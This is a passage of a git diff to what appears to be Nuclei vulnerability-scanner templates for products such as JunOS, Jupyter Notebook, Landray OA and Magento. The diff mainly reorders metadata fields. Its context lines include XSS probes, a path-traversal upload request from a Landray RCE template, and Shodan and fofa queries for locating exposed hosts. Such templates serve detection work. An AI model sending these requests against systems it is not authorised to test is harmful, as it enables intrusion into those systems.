490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/juniper/junos-xss.yaml b/http/vulnerabilities/juniper/junos-xss.yaml index 1ee53bcc2e..c66fa13a12 100644 --- a/http/vulnerabilities/juniper/junos-xss.yaml +++ b/http/vulnerabilities/juniper/junos-xss.yaml @@ -6,17 +6,16 @@ info: severity: medium reference: - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/ + classification: + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: juniper + product: junos shodan-query: title:"Juniper Web Device Manager" fofa-query: title="Juniper Web Device Manager" - product: junos - vendor: juniper tags: junos,xss - - classification: - cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* variables: string: "{{to_lower(rand_base(2))}}" @@ -28,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=<script>alert('document.domain');</script> - - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} @@ -37,6 +35,7 @@ http: rs=sajax_show_one_stub&rsargs[]={{string}}<script>alert('document.domain');</script> stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -52,4 +51,5 @@ http: - "<script>alert('document.domain');</script>" - "wrapper for" condition: and -# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/jupyter-notebook-rce.yaml b/http/vulnerabilities/jupyter-notebook-rce.yaml index e305b6c725..8ec3819932 100644 --- a/http/vulnerabilities/jupyter-notebook-rce.yaml +++ b/http/vulnerabilities/jupyter-notebook-rce.yaml @@ -8,18 +8,18 @@ info: Jupyter Notebook is an interactive Notebook, computer application is a web based visualization, Jupyter Notebook API/terminals path there are loopholes in the remote command execution. reference: - https://github.com/SCAMagic/SCAMagicScan/blob/de8130a2280ee08d719ac6612e590b8e2678fb97/pocs/poc-yaml-jupyter-notebook-rce.py + classification: + cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: jupyter + product: notebook shodan-query: title:"jupyter notebook" fofa-query: title="jupyter notebook" zoomeye-query: title:"jupyter notebook" - product: notebook - vendor: jupyter tags: jupyter,notebook,rce,bypass - classification: - cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:* http: - raw: - | @@ -45,4 +45,4 @@ http: status: - 200 -# digest: 4b0a00483046022100d06d582f3dce65ba20911abf7ffe40eca96e18be358259a394e2fa87b15b52a6022100e6287f726c5f22a21d16220fa41e95782105ffb70db2259c35a01809a6b3fb42:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d06d582f3dce65ba20911abf7ffe40eca96e18be358259a394e2fa87b15b52a6022100e6287f726c5f22a21d16220fa41e95782105ffb70db2259c35a01809a6b3fb42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-eis-sqli.yaml b/http/vulnerabilities/landray/landray-eis-sqli.yaml index 9f53e558aa..5c9ca6f1d8 100644 --- a/http/vulnerabilities/landray/landray-eis-sqli.yaml +++ b/http/vulnerabilities/landray/landray-eis-sqli.yaml @@ -8,16 +8,16 @@ info: Landray's smart collaboration platform EIS has a very rich collection of modules to meet the needs of organizations and enterprises in knowledge, collaboration, and project management system construction. There is a SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of Landray EIS smart collaboration platform reference: - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8CEIS%E6%99%BA%E6%85%A7%E5%8D%8F%E5%90%8C%E5%B9%B3%E5%8F%B0rpt_listreport_definefield.aspx%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1 + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="Landray-OA系统" - product: landray_office_automation vendor: landray + product: landray_office_automation + fofa-query: app="Landray-OA系统" tags: landray,eims,sqli - classification: - cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - "Microsoft SQL Server" - "SqlException" condition: and -# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml index 08ec9af8fe..c9b2cfdcc5 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml @@ -8,17 +8,16 @@ info: There is a remote command execution vulnerability in Lanling OA replaceExtend Method. Use This Method To Move dataxml.jsp To A Dirctory That Can Access Without Auth,Then An attacker can Run Command With this. reference: - https://forum.ywhack.com/thread-203681-1-1.html + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: landray + product: landray_office_automation fofa-query: app="Landray-OA系统" hunter-query: web.body=="蓝凌软件",web.icon=="302464c3f6207d57240649926cfc7bd4" - product: landray_office_automation - vendor: landray tags: landray,oa,dataxml,rce,replaceExtend - - classification: - cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* variables: string: "{{randstr}}" @@ -47,7 +46,6 @@ http: ../../../ekp/sys/common ------WebKitFormBoundaryL7ILSpOdIhIIvL51-- - - | POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1 Host: {{Hostname}} @@ -68,4 +66,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml index 18c956350c..70f3de5374 100755 --- a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml - https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4 + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="Landray-OA系统" - product: landray_office_automation vendor: landray + product: landray_office_automation + fofa-query: app="Landray-OA系统" tags: landray,oa,treexml,rce - classification: - cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* http: - raw: - | @@ -47,4 +47,4 @@ http: status: - 200 -# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210096f0ba9e6a94142423797bf77a9ada7c90c4b3df0f7a5da5c7f3dca65655cee60221009eaf25bf39f22f5cc51eb59c17943967a388d54fe9aa843d341a6ef2af2af5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/magento/magento-2-exposed-api.yaml b/http/vulnerabilities/magento/magento-2-exposed-api.yaml index 75580995df..0f9f729b00 100644 --- a/http/vulnerabilities/magento/magento-2-exposed-api.yaml +++ b/http/vulnerabilities/magento/magento-2-exposed-api.yaml @@ -7,15 +7,15 @@ info: description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. reference: - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api - metadata: - max-request: 3 - shodan-query: http.component:"Magento" - product: magento - vendor: magento - tags: magento - classification: cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: magento + product: magento + shodan-query: http.component:"Magento" + tags: magento + http: - method: GET path: @@ -49,4 +49,4 @@ http: - 'status_code == 200' condition: and -# digest: 490a0046304402205108a66aabb3bfd2cfa26f2fd4816a1afa5f3c52dd43f5ea029a1308d8079204022045463c3b751fd59511882d4eb2e2f046f4f31c5f5c3fcc52daac8d8adcb2214d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205108a66aabb3bfd2cfa26f2fd4816a1afa5f3c52dd43f5ea029a1308d8079204022045463c3b751fd59511882d4eb2e2f046f4f31c5f5c3fcc52daac8d8adcb2214d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/magento/magento-cacheleak.yaml b/http/vulnerabilities/magento/magento-cacheleak.yaml index d7db864938..23242e46a8 100644 --- a/http/vulnerabilities/magento/magento-cacheleak.yaml +++ b/http/vulnerabilities/magento/magento-cacheleak.yaml @@ -9,16 +9,16 @@ info: - https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/ - https://royduineveld.nl/magento-cacheleak-exploit/ + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.component:"Magento" - product: magento vendor: magento + product: magento + shodan-query: http.component:"Magento" tags: magento - classification: - cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,4 @@ http: - "application/json" part: header -# digest: 4a0a00473045022100de286b51595551dd63ed4f45c9696d2a979ce475077de534e534eb76434b95fa02206b3e3bc4edc92082864db25b3fd418e2e6c4d363e88258107d180b663dae6eb5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100de286b51595551dd63ed4f45c9696d2a979ce475077de534e534eb76434b95fa02206b3e3bc4edc92082864db25b3fd418e2e6c4d363e88258107d180b663dae6eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml index 8ad4a0a339..3fa840abc7 100644 --- a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml +++ b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml @@ -7,16 +7,16 @@ info: description: Magento version 1.9.2.x includes /dev directories or files that might reveal your passwords and other sensitive information. The /dev directories and files are not protected by default. According to Magento, "these tests are not supposed to end up on production servers". reference: - https://support.hypernode.com/en/support/solutions/articles/48001153348-how-to-secure-your-data-using-encryption-and-hashing + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.component:"Magento" - product: magento vendor: magento + product: magento + shodan-query: http.component:"Magento" tags: magento - classification: - cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: - 'status_code == 200' condition: and -# digest: 4a0a00473045022100aa2dd782c5c6482ec1191a3627d6dda4edac4923a36f14a3f84ce0d78de6c5b0022077789122da6cb4e43570c9fc4cbd341415be115088443f7f37a49fb57fa678c1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aa2dd782c5c6482ec1191a3627d6dda4edac4923a36f14a3f84ce0d78de6c5b0022077789122da6cb4e43570c9fc4cbd341415be115088443f7f37a49fb57fa678c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml index d61b12a21a..35f48b0493 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml @@ -9,17 +9,17 @@ info: - https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/ - https://bryces.io/blog/nuxt3 - https://twitter.com/fofabot/status/1669339995780558849 + classification: + cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 + vendor: nuxt + product: framework shodan-query: html:"buildAssetsDir" "nuxt" fofa-query: body="buildAssetsDir" && body="__nuxt" - product: framework - vendor: nuxt tags: huntr,lfi,nuxtjs - classification: - cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: part: header words: - "application/json" -# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml index b5ad8f5266..0cdae7821f 100644 --- a/http/vulnerabilities/other/acti-video-lfi.yaml +++ b/http/vulnerabilities/other/acti-video-lfi.yaml @@ -8,17 +8,17 @@ info: ACTI video surveillance has loopholes in reading any files reference: - https://www.cnblogs.com/hmesed/p/16292252.html + classification: + cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: acti + product: camera_firmware shodan-query: title:"Web Configurator" fofa-query: app="ACTi-视频监控" - product: camera_firmware - vendor: acti tags: acti,lfi,iot,video,monitoring - classification: - cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index f4a3244a39..192ba02a55 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -9,15 +9,15 @@ info: reference: - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html - https://demo.bagisto.com/ - metadata: - fofa-query: "Bagisto" - max-request: 1 - product: bagisto - vendor: webkul - tags: bagisto,csti,packetstorm,ssti - classification: cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: webkul + product: bagisto + fofa-query: "Bagisto" + tags: bagisto,csti,packetstorm,ssti + http: - method: GET path: @@ -36,4 +36,5 @@ http: part: content_type words: - "text/html" -# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/beyond-trust-xss.yaml b/http/vulnerabilities/other/beyond-trust-xss.yaml index 102b33b812..9fc3b330e4 100644 --- a/http/vulnerabilities/other/beyond-trust-xss.yaml +++ b/http/vulnerabilities/other/beyond-trust-xss.yaml @@ -8,17 +8,17 @@ info: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. reference: - https://www.exploit-db.com/exploits/50632 + classification: + cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: beyondtrust + product: remote_support shodan-query: html:"BeyondTrust" google-query: intext:"BeyondTrust" "Redistribution Prohibited" - product: remote_support - vendor: beyondtrust tags: beyondtrust,xss,intrusive - classification: - cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,4 @@ http: - 'contains(body, "<svg/onload=alert(document.domain)>") && contains(body, "beyondtrust")' condition: and -# digest: 4b0a00483046022100c1764a9162e0a6176f9467763300c3098e083df7c6d3d009c45082d04cdb80c8022100ad8e61a167d489f140299c3f1325493fcb534851d8d6145a521178d8927ae12c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c1764a9162e0a6176f9467763300c3098e083df7c6d3d009c45082d04cdb80c8022100ad8e61a167d489f140299c3f1325493fcb534851d8d6145a521178d8927ae12c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml index 2f7ab9348c..e2995c72f9 100755 --- a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml +++ b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml @@ -9,16 +9,16 @@ info: reference: - https://cn-sec.com/archives/1580677.html - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28 + classification: + cpe: cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="CmsEasy" - product: cmseasy vendor: cmseasy + product: cmseasy + fofa-query: app="CmsEasy" tags: cmseasy,sqli - classification: - cpe: cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a00473045022100929d88207cf831719af940ad7c2cd665c6083d14880dda52fe45a37b98f59569022033701fb59cda3f31a1f6aff6ff1e6e22d1ab3605b1dbcfeda80ebbc6a5c2bcd0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100929d88207cf831719af940ad7c2cd665c6083d14880dda52fe45a37b98f59569022033701fb59cda3f31a1f6aff6ff1e6e22d1ab3605b1dbcfeda80ebbc6a5c2bcd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml index 247d7a1df0..85a04e283c 100644 --- a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml +++ b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml @@ -8,15 +8,15 @@ info: reference: - https://www.exploit-db.com/exploits/50639 - https://nvd.nist.gov/vuln/detail/CVE-2021-45420 - metadata: - max-request: 2 - google-query: inurl:"xweb500.cgi" - product: dixell_xweb-500 - vendor: emerson - tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive - classification: cpe: cpe:2.3:h:emerson:dixell_xweb-500:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: emerson + product: dixell_xweb-500 + google-query: inurl:"xweb500.cgi" + tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive + http: - raw: - | @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010e4a776681e6e34f930a04c95521eb3982e4accdc9027c58ab8459667f9a83d022100871a7712d9cb5ad42ab459ec1a05bc81afa0b87d0758b76960016461cd31cdb8:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022010e4a776681e6e34f930a04c95521eb3982e4accdc9027c58ab8459667f9a83d022100871a7712d9cb5ad42ab459ec1a05bc81afa0b87d0758b76960016461cd31cdb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/doorgets-info-disclosure.yaml b/http/vulnerabilities/other/doorgets-info-disclosure.yaml index d6f5ee7f22..69c41e1fb6 100644 --- a/http/vulnerabilities/other/doorgets-info-disclosure.yaml +++ b/http/vulnerabilities/other/doorgets-info-disclosure.yaml @@ -9,16 +9,16 @@ info: reference: - https://packetstormsecurity.com/files/174236/DoorGets-CMS-7.0-Information-Disclosure.html - https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory + classification: + cpe: cpe:2.3:a:doorgets:doorgets:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - google-query: "Powered with doorGets ™" - product: doorgets vendor: doorgets + product: doorgets + google-query: "Powered with doorGets ™" tags: doorgets,cms,packetstorm,disclosure - classification: - cpe: cpe:2.3:a:doorgets:doorgets:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 9849c0cb04..590abf34fd 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -8,17 +8,17 @@ info: e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system reference: - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 + vendor: weaver + product: e-cology shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" - product: e-cology - vendor: weaver tags: ecology,ecology-oa,sqli - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* http: - raw: - | @@ -44,4 +44,4 @@ http: - 'contains(header_2, "ecology_JSessionid=")' condition: and -# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/fastadmin-lfi.yaml b/http/vulnerabilities/other/fastadmin-lfi.yaml index 0da57b2355..7082e78aef 100644 --- a/http/vulnerabilities/other/fastadmin-lfi.yaml +++ b/http/vulnerabilities/other/fastadmin-lfi.yaml @@ -8,16 +8,16 @@ info: Arbitrary file reading vulnerability exists in Fastadmin framework. reference: - https://github.com/wy876/POC/blob/main/Fastadmin%E6%A1%86%E6%9E%B6%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:fastadmin:fastadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="FASTADMIN-框架" - product: fastadmin vendor: fastadmin + product: fastadmin + fofa-query: app="FASTADMIN-框架" tags: fastadmin,lfi - classification: - cpe: cpe:2.3:a:fastadmin:fastadmin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml index d9f2fbaaf3..bf2bab14ea 100644 --- a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml +++ b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml @@ -9,16 +9,16 @@ info: reference: - https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486073&idx=1&sn=8e61e162262585bb8ce973b61df989b4&chksm=c1f925cbf68eacddfe441b8f1861e88068039712e467fb9bbe91eae31d439286c7147d197b07 - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/kongsoft-vgm-antivirus-wall-rce.yaml + classification: + cpe: cpe:2.3:a:kingsoft:kingsoft_antivirus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="金山VGM防毒墙" - product: kingsoft_antivirus vendor: kingsoft + product: kingsoft_antivirus + fofa-query: title="金山VGM防毒墙" tags: kingsoft,vgm,lfi - classification: - cpe: cpe:2.3:a:kingsoft:kingsoft_antivirus:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a00473045022100f2502080be7eb0c3cc36d778e65dac2e50b2dc8930e92e8253154de9305015ab0220536c3849100109e24770d3ade708928f6be51ee39cb53ef97cb149042ae724c9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f2502080be7eb0c3cc36d778e65dac2e50b2dc8930e92e8253154de9305015ab0220536c3849100109e24770d3ade708928f6be51ee39cb53ef97cb149042ae724c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index 1cb7f80e57..746a5b8450 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -9,15 +9,15 @@ info: - https://hackerone.com/reports/968402 - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/ - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml - metadata: - max-request: 1 - shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 - product: kiwi_tcms - vendor: kiwitcms - tags: kiwitcms,exposure,misconfig,hackerone - classification: cpe: cpe:2.3:a:kiwitcms:kiwi_tcms:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kiwitcms + product: kiwi_tcms + shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 + tags: kiwitcms,exposure,misconfig,hackerone + http: - raw: - | @@ -48,4 +48,5 @@ http: part: body json: - .result[].username -# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950 + +# digest: 